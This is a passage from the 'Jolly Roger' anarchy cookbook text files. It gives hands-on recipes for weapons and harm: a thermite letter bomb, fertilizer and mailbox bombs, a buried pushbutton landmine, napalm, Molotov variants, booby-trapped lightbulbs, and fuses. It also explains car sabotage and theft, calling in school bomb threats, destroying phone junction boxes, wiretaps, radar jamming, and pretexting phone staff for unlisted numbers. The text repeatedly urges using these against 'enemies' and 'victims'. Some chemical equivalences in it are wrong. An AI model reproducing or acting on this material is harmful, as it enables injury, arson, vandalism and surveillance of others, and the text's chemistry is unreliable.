- Now to light it... this is the tricky part and hard to explain.Just keep experimenting until you get something that works. Thefuse is just that touch explosive I have told you about in anotherone of my anarchy files. You might want to wrap it like a longcigarette and then place it at the top of the envelope in theouter layer (on top of the powdered magnesium). When the touchexplosive is torn or even squeezed hard it will ignite thepowdered magnesium (sort of a flash light) and then it will burnthe mild thermite. If the thermite didn't blow up, it would atleast burn the fuck out of your enemy (it does wonders on humanflesh!).
NOW that is REVENGE! -Jolly Roger-
Paint Bombs by The Jolly Roger
To make a pain bomb you simply need a metal pain can with arefastenable lid, a nice bright color paint (green, pink, purple,or some gross color is perfect!), and a quantity of dry ice. Placethe paint in the can and then drop the dry ice in. Quicky placethe top on and then run like hell! With some testing you can timethis to a science. It depends on the ratio of dry ice to paint tothe size of the can to how full it is. If you are really pissedoff at someone, you could place it on their doorstep, knock on thedoor, and then run!! Paint will fly all over the place HAHAHA!! -Jolly Roger-

Ways to send a car to Hell by The Jolly Roger
There are 1001 ways to destroy a car but I am going to cover onlythe ones that are the most fun (for you), the most destructive(for them), and the hardest to trace (for the cops).
- Place thermite on the hood, light it, and watch it burn all theway through the pavement!
- Tape a CO2 bomb to the hood, axel, gas tank, wheel, muffler,etc.)
- Put a tampon, dirt, sugar (this on is good!), a ping pong ball,or just about anything that will dissolve in the gas tank.
- Put potatoes, rocks, banannas, or anything that will fit, intothe tailpipe. Use a broom handle to stuff 'em up into thetailpipe.
- Put a long rag into the gas tank and light it...
- Steal a key, copy it, replace it, and then steal the stereo.
- Break into the car. Cut a thin metal ruler into a shape likethis: ---- < ----
Slide it into the outside window and keep pulling it back up untilyou catch the lock cable which should unlock the door. This deviceis also called a SLIM JIM. Now get the stereo, equalizer, radardetector, etc. Now destroy the inside. (A sharp knife does wonderson the seats!)
Have Fun! -Jolly Roger-
Do ya hate school? by The Jolly Roger
- One of my favorites for getting out of a class or two is to callin a bomb threat. Tell 'em that it is in a locker. Then they haveto check them all, whilst you can slip away for an hour or two.You can even place a fake bomb (in any locker but YOURS!). Theymight cancel school for a week while they investigate (of course,you will probably have to make it up in the summer...).
- Get some pure potassium or pure sodium, put it in a capsule, andflush it down the toilet (smells awful! Stinks up the whole school!).
- Use a smoke grenade in the hallway.
- Steal the computer passwords & keys. Or steal the 80 column cards inside if they are (gag) IBM.
- Make friends with student assistants and have them change yourgrades when the teachers hand in their bubble sheets for the reportcards.
- Spit your gum out on the carpet in the library or whatever andgrind it into the carpet. Watch the janitors cry!
- Draw on lockers or spraypaint on the building that the principalis a fascist.
- Stick a potato in the tailpipe of the principal's car.
- USE YOUR IMAGINATION! -Jolly Roger-
Phone related vandalism by the Jolly Roger
If you live where there are underground lines then you will beable to ruin someone's phone life very easily. All you must do isgo to their house and find the green junction box that interfacestheir line (and possibly some others in the neighborhood) with themajor lines. These can be found just about anywhere but they areusually underneath the nearest phone pole. Take a socket wrenchand loosen the nut on the right. Then just take clippers or asledge hammer or a bomb and destroy the insides and pull up theirphone cable. Now cut it into segments so it can't be fixed butmust be replaced (There is a week's worth of work for 'em!!) -Jolly Roger-

Highway radar jamming by The Jolly Roger
Most drivers wanting to make better time on the open road willinvest in one of those expensive radar detectors. However, thisdevice will not work against a gun type radar unit in which theradar signal is not present until the cop has your car in hissights and pulls the trigger. Then it is TOO LATE for you to slowdown. A better method is to continuously jam any signal with aradar signal of your own. I have tested this idea with thecooperation of a local cop and found that his unit reads random
numbers when my car approached him. It is suprisingly easy to makea low power radar transmitter. A nifty little semiconductor calleda Gunn Diode will generate microwaves when supplied with the 5 to10 volt DC and enclosed in the correct size cavity (resonater). An8 to 3 terminal regulator can be used to get this voltage from acar's 12v system. However, the correct construction and tuning ofthe cavity is difficult without good microwave measurementequipment. Police radars commonly operate on the K band at 22 ghz.Or more often on the X band at 10.525 ghz. most microwave intruderalarms and motion detectors (mounted over automatic doors insupermarkets & banks, etc.) contain a Gunn typetransmitter/receiver combination that transmits about 10 kilowattsat 10.525 ghz. These units work perfectly as jammers. If youcannot get one locally, write to Microwave Associates inBurlington, Massachusettes and ask them for info on 'Gunnplexers'for ham radio use. When you get the unit it may be mounted in aplastic box on the dash or in a weather-proff enclosure behind thePLASTIC grille. Switch on the power when on an open highway. Theunit will not jam radar to the side or behind the car so don't gospeeding past the radar trap. An interesting phenomena you willnotice is that the drivers who are in front of you who are usingdetectors will hit their brakes as you approach large metal signsand bridges. Your signal is bouncing off of these objects andtriggering their radar detectors! HAVE FUN! -Jolly Roger-
P.S. If you are interested in this sort of thing, get a copy ofPOPULAR COMMUNICATIONS. The ads in there tell you where you canget all kinds of info on all kinds of neat equipment for all kindsof neat things!
Smoke Bombs by the Jolly Roger
Here is the recipe for one helluva smoke bomb!
4 parts sugar6 parts potassium nitrate (Salt Peter)
Heat this mixture over a LOW flame until it melts, stirring well.Pour it into a future container and, before it solidifies, imbed afew matches into the mixture to use as fuses. One pound of thisstuff will fill up a whole block with thick, white smoke!
Mail Box Bombs by the Jolly Roger
(1) Two litre bottle of chlorine (must contain sodium hypochlorate)
Small amount of sugar
Small amount of water
Mix all three of these in equal amounts to fill about 1/10 of thebottle. Screw on the lid and place in a mailbox. It's hard tobelieve that such a small explosion will literally rip the mailboxin half and send it 20 feet into the air! Be careful doing this,
though, because if you are caught, it is not up to the personwhose mailbox you blew up to press charges. It is up to the city. -Jolly Roger-
The easiest way to hotwire cars by the Jolly Roger
Get in the car. Look under the dash. If it enclosed, forget itunless you want to cut through it. If you do, do it near theignition. Once you get behind or near the ignition look for twored wires. In older cars red was the standard color, if not, lookfor two matched pairs. When you find them, cross them and takeoff! -Jolly Roger-
How to make Napalm by the Jolly Roger
- Pour some gas into an old bowl, or some kind of container.
- Get some styrofoam and put it in the gas, until the gas won'teat anymore. You should have a sticky syrup.
- Put it on the end of something (don't touch it!!). The unusedstuff lasts a long time! -Jolly Roger-

How to make a fertilizer bomb by Jolly Roger
Ingredients:
- Newspaper- Fertilizer (the chemical kind, GREEN THUMB or ORCHO)- Cotton- Diesel fuel
Make a pouch out of the newspaper and put some fertilizer in it.Then put cotton on top. Soak the cotton with fuel. Then light andrun like you have never ran before! This blows up 500 square feetso don't do it in an alley!! -Jolly Roger-

Tennis Ball Bombs by The Jolly Roger
Ingredients:
- Strike anywhere matches- A tennis ball- A nice sharp knife- Duct tape
Break a ton of matchheads off. Then cut a SMALL hole in the tennisball. Stuff all of the matchheads into the ball, until you can'tfit any more in. Then tape over it with duct tape. Make sure it isreal nice and tight! Then, when you see a geek walking down thestreet, give it a good throw. He will have a blast!!
-Jolly Roger-
Diskette Bombs by the Jolly Roger
You need:
- A disk - Scissors - White or blue kitchen matches (they MUST be these colors!) - Clear nail polish
- Carefully open up the diskette (3.5" disks are best for this!)
- Remove the cotton covering from the inside.
- Scrape a lot of match powder into a bowl (use a wooden scraper,metal might spark the matchpowder!)
- After you have a lot, spread it evenly on the disk.
- Using the nail polish, spread it over the match mixture
- Let it dry
- Carefully put the diskette back together and use the nail polishto seal it shut on the inside (where it came apart).
- When that disk is in a drive, the drive head attempts to readthe disk, which causes a small fire (ENOUGH HEAT TO MELT THE DISKDRIVE AND FUCK THE HEAD UP!!). ahahahahaha! Let the fuckhead tryand fix THAT!!! -Jolly Roger-

Unlisted Phone Numbers by The Jolly Roger
There are a couple of different ways of doing this. Let's see ifthis one will help: Every city has one or more offices dedicatedto assigning numbers to the telephone wire pairs. These officesare called DPAC offices and are available to service reps who areinstalling or repairing phones. To get the DPAC number, a servicerep would call the customer service number for billing informationin the town that the number is located in that he is trying to getthe unlisted number of. (Got that?) The conversation would gosomething like this: "Hi, Amarillo, this is Joe from Anytownbusiness office, I need the DPAC number for the south side oftown." This info is usually passed out with no problems, so... ifthe first person you call doesn't have it, try another. REMEMBER,no one has ANY IDEA who the hell you are when you are talking onthe phone, so you can be anyone you damn well please! (heheheheh!)When you call the DPAC number, just tell them that you need alisting for either the address that you have, or the name. DPACDOES NOT SHOW WHETHER THE NUMBER IS LISTED OR UNLISTED!! Also, ifyou're going to make a habit of chasing numbers down, you mightwant to check into geting a criss-cross directory, which listsphone numbers by their addresses. It costs a couple-a-hundred bux,but it is well worth it if you have to chase more than one or two
numbers down! -Jolly Roger-
Fuses brought to you by The Jolly Roger
You would be surprised how many files are out there that use whatfalls under the category of a "fuse." They assume that you justhave a few lying around, or know where to get them. Well, in someparts of the country, fuses are extremely hard to come by... sothis file tells you how to make your own. Both fuses presentedhere are fairly simple to make, and are fairly reliable.
SLOW BURNING FUSE~~~~~~~~~~~~~~~~~ (approx. 2 inches per minute)
Materials needed:
- Cotton string or 3 shoelaces - Potassium Nitrate or Potassium Chlorate - Granulated sugar
Procedure:
- Wash the cotton string or showlaces in HOT soapy water, thenrinse with fresh water
- Mix the following together in a glass bowl: 1 part potassium nitrate or potassium chlorate 1 part granulated sugar 2 parts hot water
- Soak strings or shoelaces in this solution
- Twist/braid 3 strands together and allow them to dry
- Check the burn rate to see how long it actually takes!!
FAST BURNING FUSE~~~~~~~~~~~~~~~~~ (40 inches per minute)
Materials needed:
-Soft cotton string -fine black powder (empty a few shotgun shells!) -shallow dish or pan
Procedure:
- moisten powder to form a paste
- twist/braid 3 strands of cotton together
- rub paste into string and allow to dry
- Check the burn rate!!!

How to make Potassium Nitrate by The Jolly Roger
Potassium Nitrate is an ingredient in making fuses, among otherthings. Here is how you make it:
Materials needed:
-3.5 gallons of nitrate bearing earth or other material -1/2 cup of wood ashes -Bucket or other similar container about 4-5 gallons in volume -2 pieces of finely woven cloth, each a bit bigger than the bottom of the bucket -Shallow dish or pan at least as large in diameter as the bucket -Shallow, heat resistant container -2 gallons of water -Something to punch holes in the bottom of the bucket -1 gallon of any type of alcohol -A heat source -Paper & tape
Procedure:
- Punch holes on the inside bottom of the bucket, so that themetal is"puckered" outward from the bottom
- Spread cloth over the holes from the bottom
- Place wood ashes on the cloth. Spread it out so that it coversthe entire cloth and has about the same thickness.
- Place 2nd cloth on top of the wood ashes
- Place the dirt or other material in the bucket
- Place the bucket over the shallow container. NOTE: It may needsupport on the bottom so that the holes on the bottom are notblocked.
- Boil water and pour it over the earth very slowly. Do NOT pourit all at once, as this will clog the filter on the bottom.
- Allow water to run through holes into the shallow dish on thebottom.
- Be sure that the water goes through ALL of the earth!
- Allow water in dish to cool for an hour or so
- Carefully drain the liquid in the dish away, and discard thesludge in the bottom
- Boil this liquid over a fire for at least two hours. Smallgrains of salt will form - scoop these out with the paper as theyform
- When the liquid has boiled down to 1/2 its original volume letit sit
- After 1/2 hour, add equal volume of the alcohol; when thismixture is poured through paper, small white crystals appear. Thisis the posassium nitrate.
Purification:
- Redissolve crystals in small amount of boiling water
- Remove any crystals that appear
- Pour through improvised filter then heat concentrated solutionto dryness.
- Spread out crystals and allow to dry
Exploding lightbulbs by The Jolly Roger
Materials needed:
-lightbulb (100w) -socket (duh...) -1/4 cup soap chips -blackpowder! (open some shotgun shells!) -1/4 cup kerosene orgasoline -adhesive tape -lighter or small blowtorch -glue
Procedure for a simple exploding lightbulb:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Drill a small hole in the top of the bulb near the threads!
- Carefully pour the blackpowder into the hole. Use enough sothat it touches the filament!
- Insert into socket as normal (make sure the light is off orelse YOU will be the victim!!)
- Get the hell out!!
Procedure for a Napam Bulb:~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Heat kerosene/gasoline in a double boiler
- Melt soap chips, stirring slowly.
- Put somewhere and allow to cool
- Heat the threads of the bulb VERY carefully to melt the glue.Remove threads, slowly drawing out the filament. Do NOT break thecheap electrical igniters and/or the filament or this won't work!!
- Pour the liquid into the bulb, and slowly lower the filamentback down into the bulb. Make sure the filament is dipped into thefluid.
‡ - Re-glue the threads back on. Insert it into a socket frequentlyused by the victim and get the hell out!!
When the victim flips the switch, he will be in for a BIG surprise!
Have fun! -Jolly Roger-

Under water igniters by The Jolly Roger
Materials needed:
-Pack of 10 silicon diodes (available at Radio Shack. you will know you got the right ones if they are very, very small glass objects!) -Pack of matches -1 candle
Procedure:
- Light the candle and allow a pool of molten wax to form in thetop.
- Take a single match and hold the glass part of a single diodeagainst the head. Bend the diode pins around the matchhead so thatone wraps in an upward direction and thensticks out to the side.Do the same with the other wire, but in a downward direction. Thediodes should now be hugging the matchhead, but its wires MUST NOTTOUCH EACH OTHER!
- Dip the matchhead in wax to give it a water-proof coat. Thesework underwater
- repeat to make as many as you want
How to use them:
When these little dudes are hooked across a 6v battery, the diodereaches what is called breakdown voltage. When most electricalcomponents reach this voltage, they usually produce great amountsof heat and light, while quickly melting into a little blob. Thisheat is enough to ignite a matchhead. These are recommended foruse underwater, where most other igniters refuse to work. ENJOY! -Jolly Roger-
Home-brew blast cannon by The Jolly Roger
Materials needed:
-1 plastic drain pipe, 3 feet long, at least 3 1/2 inches in diameter -1 smaller plastic pipe, about 6 inches long, 2 inches in diameter -1 large lighter, with fluid refills (this gobbles it up!) -1 pipe cap to fit the large pipe, 1 pipe cap to fit the small pipe
-5 feet of bellwire -1 SPST rocker switch -16v polaroid pot-a-pulse battery -15v relay (get this at Radio Shack) -Electrical Tape -One free afternoon
Procedure:
- Cut the bell wire into three equal pieces, and strip the ends
- Cut a hole in the side of the large pipe, the same diameter asthe small pipe. Thread the hole and one end of the small pipe.they should screw together easily.
- Take a piece of scrap metal, and bend it into an "L" shape,then attach it to the level on the lighter:
/------------------------gas switch is here V /------!lighter!!<---metal lever!!!!!
Now, every time you pull the 'trigger' gas should flow freely fromthe lighter. You may need to enlarge the 'gas port' on yourlighter, if you wish to be able to fire more rapidly.
- Connect two wires to the two posts on the switch
- Cut two holes in the side of the smaller tube, one for theswitch on the bottom, and one for the metal piece on the top.Then, mount the switch in the bottom, running the wires up and outof the top.
- Mount the lighter/trigger in the top. Now the switch shouldrock easily, and the trigger should cause the lighter to pour outgas. Re-screw the smaller tube into the larger one, hold down thetrigger a bit, let it go, and throw a match in there. If all goeswell, you should hear a nice big 'THUD!'
- Get a hold of the relay, and take off the top.
1---------------v/ 2--------------/<--- the center object is the metal finger inside 3 the relay cc-------------/ oo----------------4 ii ll----------------5
Connect (1) to one of the wires coming from the switch. Connect(2) to (4), and connect (5) to one side of the battery. Connectthe remaining wire from the switch to the other side of thebattery. Now you should be able to get the relay to make a little'buzzing' sound when you flip the switch and you should see some
tiny little sparks.
- Now, carefully mount the relay on the inside of the large pipe,towards the back. Screw on the smaller pipe, tape the battery tothe side of the cannon barrel (yes, but looks aren't everything!)
- You should now be able to let a little gas into the barrel andset it off by flipping the switch.
- Put the cap on the back end of the large pipe VERY SECURELY.You are now ready for the first trial-run!
To Test:
Put something very, very large into the barrel, just so that itfits 'just right'. Now, find a strong guy (the recoil willprobably knock you on your ass if you aren't careful!). Put on ashoulderpad, earmuffs, and possibly some other protective clothing(trust the Jolly Roger! You are going to need it!). Hold thetrigger down for 30 seconds, hold on tight, and hit the switch.With luck and the proper adjustments, you should be able to put afrozed orange through 1/4 or plywood at 25 feet.
Have fun! -Jolly Roger-
Chemical Equivalency list by the Jolly Roger
Acacia..................................................Gum ArabicAcetic Acid................................................VinegarAluminum Oxide..............................................AlumiaAluminum Potassium Sulphate...................................AlumAluminum Sulfate..............................................AlumAmmonium Carbonate.......................................HartshornAmmonium Hydroxide.........................................AmmoniaAmmonium Nitrate........................................Salt PeterAmmonium Oleate.......................................Ammonia SoapAmylacetate............................................Bananna OilBarium Sulfide...........................................Black AshCarbon Carbinate.............................................ChalkCarbontetrachloride.................................Cleaning FluidCalcium Hypochloride..............................Bleaching PowderCalcium Oxide.................................................LimeCalcium Sulfate...................................Plaster of ParisCarbonic Acid..............................................SeltzerCetyltrimethylammoniumbromide........................Ammonium SaltEthylinedichloride.....................................Dutch FluidFerric Oxide.............................................Iron RustFurfuraldehyde............................................Bran OilGlucose.................................................Corn SyrupGraphite...............................................Pencil LeadHydrochloric Acid....................................Muriatic AcidHydrogen Peroxide.........................................PeroxideLead Acetate.........................................Sugar of LeadLead Tero-oxide...........................................Red LeadMagnesium Silicate............................................TalcMagnesium Sulfate.......................................Epsom SaltMethylsalicylate..................................Winter Green Oil
Naphthalene..............................................MothballsPhenol...............................................Carbolic AcidPotassium Bicarbonate..............................Cream of TarterPotassium Chromium Sulfate..............................ChromealumPotassium Nitrate.......................................Salt PeterSodium Oxide..................................................SandSodium Bicarbonate.....................................Baking SodaSodium Borate................................................BoraxSodium Carbonate......................................Washing SodaSodium Chloride...............................................SaltSodium Hydroxide...............................................LyeSodium Silicate..............................................GlassSodium Sulfate......................................Glauber's SaltSodium Thiosulfate.............................Photographer's HypoSulfuric Acid.........................................Battery AcidSucrose.................................................Cane SugarZinc Chloride.......................................Tinner's FluidZinc Sulfate.........................................White Vitriol

Phone Taps by The Jolly Roger
Here is some info on phone taps. In this file is a schematic for asimple wiretap & instructions for hooking up a small tape recordercontrol relay to the phone line.
First, I will discuss taps a little. There are many differenttypes of taps. there are transmitters, wired taps, and inductiontaps to name a few. Wired and wireless transmitters must bephysically connected to the line before they will do any good.Once a wireless tap is connected to the line,it can transmit allconversations over a limited reception range. The phones in thehouse can even be modifies to pick up conversations in the roomand transmit them too! These taps are usually powered off of thephone line, but can have an external power source. You can get moreinformation on these taps by getting an issue of PopularCommunications and reading through the ads. Wired taps, on theother hand, need no power source, but a wire must be run from theline to the listener or to a transmitter. There are obviousadvantages of wireless taps over wired ones. There is one type ofwireless tap that looks like a normal telephone mike. All you haveto do is replace the original mike with thisand itwill transmitall conversations! There is also an exotic type of wired tap knownas the 'Infinity Transmitter' or 'Harmonica Bug'. In order to hookone of these, it must be installed inside the phone. When someonecalls the tapped phone & *before* it rings,blows a whistle overthe line, the transmitter picks up the phone via a relay. The mikeon the phone is activated so that the caller can hear all of theconversations in the room. There is a sweep tone test at415/BUG-1111 which can be used to detect one of these taps. If oneof these is on your line & the test # sends the correct tone, youwill hear a click. Induction taps have one big advantage over tapsthat must be physically wired to the phone. They do not have to betouching the phone in order to pick up the conversation. They workon the same principle as the little suction-cup tape recordermikes that you can get at Radio Shack. Induction mikes can behooked up to a transmitter or be wired.
‡Here is an example of industrial espionage using the phone: A salesman walks into an office & makes a phone call. He fakesthe conversation, but when he hangs up he slips some foam rubbercubes into the cradle. The called party can still hear allconversations in the room. When someone picks up the phone, thecubes fall away unnoticed.
A tap can also be used on a phone to overhear what your modem isdoing when you are wardialing, hacking, or just plain calling abbs (like the White Ruins! Denver, Colorado! 55 megs online!Atari! Macintosh! Amiga! Ibm! CALL IT! 303-972-8566! By the way, idid this ad without the sysops consent or knowledge!).
Here is the schematic:-------)!----)!(-------------> )!( Cap ^ )!( )!( )!( )!( ^^^^^---)!(-------------> ^ 100K ! ! The 100K pot is used for volume. It should be on its highest(least resistance) setting if you hook a speaker across theoutput. but it should be set on its highest resistance for a taperecorder or amplifier. You may find it necessary to add another10 - 40K. The capacitor should be around .47 MFD. It's onlypurpose is to prevent the relay in the phone from tripping &thinking that you have the phone off of the hook. the audio outputtransformer is available at Radio Shack. (part # 273-138E forinput). The red & the white wires go to the output device. You maywant to experiment with the transformer for the best output.Hooking up a tape recorder relay is easy. Just hook one of the phonewires (usually red) to the the end of one of the relay & the therend just loop around. This bypasses it. It should look like this:
------^^^^^^^^^------------ --------- RELAY^^(part #275-004 from Radio Shack works fine)
If you think that you line is tapped, the first thing to do is tophysically inspect the line yourself ESPECIALLY the phones. Youcan get mike replacements with bug detectors built in. However, Iwould not trust them too much. It is too easy to get a wrongreading.
For more info:
BUGS AND ELECTRONIC SURVEILANCE from Desert PublicationsHOW TO AVOID ELECTRONIC EAVESDROPPING & PRIVACY INVASION. I do notremember who this one is from... you might want to try PaladinPress.
-Jolly Roger-

How to make a landmine by The Jolly Roger
First, you need to get a pushbutton switch. Take the wires of itand connect one to a nine volt battery connector and the other toa solar igniter (used for launching model rockets). A very thinpiece of stereo wire will usually do the trick if you aredesperate, but I recommend the igniter. Connect the other wire ofthe nine-volt battery to one end of the switch. Connect a wirefrom the switch to the other lead on the solar igniter.
switch-----------battery \ / \ / \ / \ / solar igniter explosive
Now connect the explosive (pipe bomb, m-80, CO2 bomb, etc.) to theigniter by attaching the fuse to the igniter (seal it with scotchtape). Now dig a hole; not too deep but enough to cover all of thematerials. Think about what direction your enemy will be coming fromand plant the switch, but leave the button visible (not TOOvisible!). Plant the explosive about 3-5 feet away from the switchbecause there will be a delay in the explosion that depends on howshort your wick is, and, if a homemade wick is being used, itsburning speed. But if you get it right... and your enemy is closeenough......... BBBBBBBOOOOOOOOOOOOOOOOOOOOOOOOMMMM! hahahaha
-Jolly Roger-
A different kind of Molitoff Cocktail by the Jolly Roger
Here is how you do it:
- Get a coke bottle & fill it with gasoline about half full
- Cram a piece of cloth into the neck of it nice and tight
- Get a chlorine tablet and stuff it in there. You are going to haveto force it because the tablets are bigger than the opening of thebottle.
- Now find a suitable victim and wing it in their direction. When ithits the pavement or any surface hard enough to break it, and the chlorineand gasoline mix..... BOOM!!!!!!Have fun! -Jolly Roger-
Phone Systems Tutorial by The Jolly Roger
To start off, we will discuss the dialing procedures for domesticas well as international dialing. We will also take a look at the
telephone numbering plan.
North American Numbering Plan~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In North America, the telephone numbering plan is as follows:
A) a 3 digit Numbering Plan Area (NPA) code , ie, area codeB) a 7 digit telephone # consisting of a 3 digit Central Office(CO) code plus a 4 digit station #
These 10 digits are called the network address or destinationcode. It is in the format of:
Area Code Telephone # --------- -----------
N*X NXX-XXXX
Where: N = a digit from 2 to 9 * = the digit 0 or 1 X = a digit from 0 to 9
Area Codes~~~~~~~~~~
Check your telephone book or the seperate listing of area codesfound on many bbs's. Here are the special area codes (SAC's):
510 - TWX (USA) 610 - TWX (Canada) 700 - New Service 710 - TWX (USA) 800 - WATS 810 - TWX (USA) 900 - DIAL-IT Services 910 - TWX (USA)
The other area codes never cross state lines, therefore each statemust have at least one exclusive NPA code. When a community issplit by a state line, the CO #'s are often interchangeable (ie,you can dial the same number from two different area codes).
TWX (Telex II) consists of 5 teletype-writer area codes. They areowned by Western Union. These SAC's may only be reached via otherTWX machines. These run at 110 baud (last I checked! They are mostlikely faster now!). Besides the TWX #'s, these machines arerouted to normal telephone #'s. TWX machines always respond withan answerback. For example, WU's FYI TWX # is (910) 279-5956. Theanswerback for this service is "WU FYI MAWA".
If you don't want to but a TWX machine, you can still send TWXmessages using Easylink [800/325-4112]. However you are gonna haveto hack your way onto this one!
700:
700 is currently used by AT&T as a call forwarding service. It is
targeted towards salesmen on the run. To understand how thisworks, I'll explain it with an example. Let's say Joe Q. Salespigworks for AT&T security and he is on the run chasing a phreakaround the country who royally screwed up an important COSMOSsystem. Let's say that Joe's 700 # is (700) 382-5968. EverytimeJoe goes to a new hotel (or most likely SLEAZY MOTEL), he dials aspecial 700 #, enters a code, and the number where he is staying.Now, if his boss received some important info, all he would do isdial (700) 382-5968 and it would ring wherever Joe last progammedit to. Neat, huh?
800:
This SAC is one of my favourites since it allows for toll freecalls. INWARD WATS (INWATS), or Inward Wide AreaTelecommunications Service is the 800 #'s that we are all familiarwith. 800 #'s are set up in service areas or bands. There are 6 ofthese. Band 6 is the largest and you can call a band 6 # fromanywhere in the US except the state where the call is terminated(that is why most companies have one 800 number for the counteryand then another one for their state.) Band 5 includes the 48contiguous states. All the way down to band 1 which includes onlythe states contiguous to that one. Therefore, less people canreach a band 1 INWATS # than a band 6 #.
Intrastate INWATS #'s (ie, you can call it from only 1 state)always have a 2 as the last digit in the exchange (ie, 800-NX2-XXXX). The NXX on 800 #'s represent the area where the business islocated. For example, a # beginning with 800-431 would terminateat a NY CO.
800 #'s always end up in a hunt series in a CO. This means that ittries the first # allocated to the company for their 800 lines; ifthis is busy, it will try the next #, etc. You must have a minimumof 2 lines for each 800 #. For example, Travelnet uses a huntseries. If you dial (800) 521-8400, it will first try the #associated with 8400; if it is busy it will go to the nextavailable port, etc. INWATS customers are billed by the number ofhours of calls made to their #.
OUTWATS (OUTWARD WATS): OUTWATS are for making outgoing callsonly. Largecompanies use OUTWATS since they receive bulk-ratediscounts. Since OUTWATS numbers cannot have incoming calls, theyare in the format of:
(800) *XXX-XXXX
Where * is the digit 0 or 1 (or it may even be designated by aletter) which cannot be dialed unless you box the call. The *XXidentifies the type of service and the areas that the company cancall.
Remember:
INWATS + OUTWATS = WATS EXTENDER
900:
This DIAL-IT SAC is a nationwide dial-it service. It is use fortaking television polls and other stuff. The first minutecurrently costs an outrageous 50-85 cents and each additionalminute costs 35-85 cents. Hell takes in a lot of revenue this way!
Dial (900) 555-1212 to find out what is currently on this service.
CO CODES~~~~~~~~
These identify the switching office where the call is to berouted. The following CO codes are reserved nationwide:
555 - directory assistance 844 - time. These are now in! 936 - weather the 976 exchange 950 - future services 958 - plant test 959 - plant test 970 - plant test (temporary) 976 - DIAL-IT services
Also, the 3 digit ANI & ringback #'s are regarded as plant testand are thus reserved. These numbers vary from area to area.
You cannot dial a 0 or 1 as the first digit of the exchange code(unless using a blue box!). This is due to the fact that theseexchanges (000-199) contains all sorts of interesting shit such asconference #'s, operators, test #'s, etc.
950:
Here are the services that are currently used by the 950 exchange:
1000 - SPC 1022 - MCI Execunet 1033 - US Telephone 1044 - Allnet 1066 - Lexitel 1088 - SBS Skyline
These SCC's (Specialized Common Carriers) are free from fortressphones! Also, the 950 exchange will probably be phased out withthe introduction of Equal Access
Plant Tests:
These include ANI, Ringback, and other various tests.
976:
Dial 976-1000 to see what is currently on the service. Also, manybbs's have listings of these numbers.
N11 codes:----------Bell is trying to phase out some of these, but they still exist inmost areas.
‡ 011 - international dialing prefix 211 - coin refund operator 411 - directory assistance 611 - repair service 811 - business office 911 - EMERGENCY
International Dialing~~~~~~~~~~~~~~~~~~~~~
With International Dialing, the world has been divided into 9numbering zones. To make an international call, you must firstdial: International Prefix + Country code + National #
In North America, the international dialing prefix is 011 forstation-to-station calls. If you can dial International #'sdirectly in your area then you have International Direct DistanceDialing (IDDD).
The country code, which varies from 1 to 3 digits, always has theworld numbering zone as the first digit. For example, the countrycode for the United Kingdom is 44, thus it is in world numberingzone 4. Some boards may contain a complete listing of othercountry codes, but here I give you a few:
1 - North America (US, Canada, etc.) 20 - Egypt 258 - Mozambique 34 - Spain 49 - Germany 52 - Mexico (southern portion) 7 - USSR 81 - Japan 98 - Iran (call & hassle those bastards!)
If you call from an area other than North America, the format isgenerally the same. For example, let's say that you wanted to callthe White House from Switzerland to tell the prez that hisnumbered bank account is overdrawn (it happens, you know! ha ha).First you would dial 00 (the SWISS international dialing refix),then 1 (the US country code), followed by 202-456-1414 (thenational # for the White House. Just ask for Georgy and give himthe bad news!)
Also, country code 87 is reserved for Maritime mobile service, ie,calling ships:
871 - Marisat (Atlantic) 871 - Marisat (Pacific) 872 - Marisat (Indian)
International Switching:------------------------
In North America there are currently 7 no. 4 ESS's that performthe duty of ISC (Inter-nation Switching Centers). Allinternational calls dialed from numbering zone 1 will be routedthrough one of these "gateway cities". They are:
‡ 182 - White Plains, NY 183 - New York, NY 184 - Pittsburgh, PA 185 - Orlando, Fl 186 - Oakland, CA 187 - Denver, CO 188 - New York, NY
The 18X series are operator routing codes for overseas access (tobe furthur discussed with blue boxes). All international calls usea signaling service called CCITT.It is an international standardfor signaling.
Ok.. there you go for now! If you wanna read more about this, readpart two which is the next file #36 in the Jolly Roger's cookbook!
-Jolly Roger-
Phone Systems Tutorial part II by The Jolly Roger
Part II will deal with the various types of operators, officeheirarchy, & switching equipment.
Operators~~~~~~~~~
There are many types of operators in the network and the morecommon ones will be discussed.
TSPS Operator:
The TSPS [(Traffic Service Position System) ass opposed to ThisShitty Phone Service] Operator is probably the bitch (or bastard,for the female libertationists out there) that most of us are usedto having to deal with. Here are his/her responsibilities:
1) Obtaning billing information for calling card or third numbercalls
2) Identifying called customer on person-to-person calls.
3) Obtaining acceptance of charges on collect calls.
4) Identifying calling numbers. This only happens when the calling# is not automatically recorded by CAMA (Centralized AutomaticMessage Accounting) & forwarded from the local office. This couldbe caused by equipment failures (ANIF- Automatic NumberIdentification Failure) or if the office is not equipped for CAMA(ONI- Operator Number Identification).
‡You should not mess with the TSPS operator since she KNOWS whichnumber that you are calling from. Your number will show up on a10-digit LED read-out (ANI board). She also knows whether or notyou are at a fortress phone & she can trace calls quite readily!Out of all of the operators, she is one of the MOST DANGEROUS.
INWARD operator:
This operator assists your local TSPS ("0") operatorin connectingcalls. She will never question a call as long as the call iswithing HER SERVICE AREA. She can only be reached via otheroperators or by a blue box. From a blue box, you would dialKP+NPA+121+ST for the INWARD operator that will help you connectany calls within that NPA only. (Blue Boxing will be discussed ina future file).
DIRECTORY ASSISTANCE Operator:
This is the operator that you are connected to when you dial: 411or NPA-555-1212. She does not readily know where you are callingfrom. She does not have access to unlisted numbers, but she DOESknow if an unlisted # exists for a certain listing.
There is also a directory assistance operator for deaf people whouse teletypewriters. If your modem can transfer BAUDOT [(45.5baud). One modem that I know of that will do this is the Apple Catacoustic or the Atari 830 acoustic modem. Yea I know they are hardto find... but if you wanna do this.. look around!) then you cancall him/her up and have an interesting conversation. The # is:800-855-1155. They use the standard Telex abbreviations such as GAfor go ahead. they tend to be nicer and will talk longer than yourregular operators. Also, they are more vulnerable into beingtalked out of information through the process of "socialengineering" as Chesire Catalyst would put it.
Other operators have access to their own DA by dialingKP+NPA+131+ST (MF).
CN/A operators:
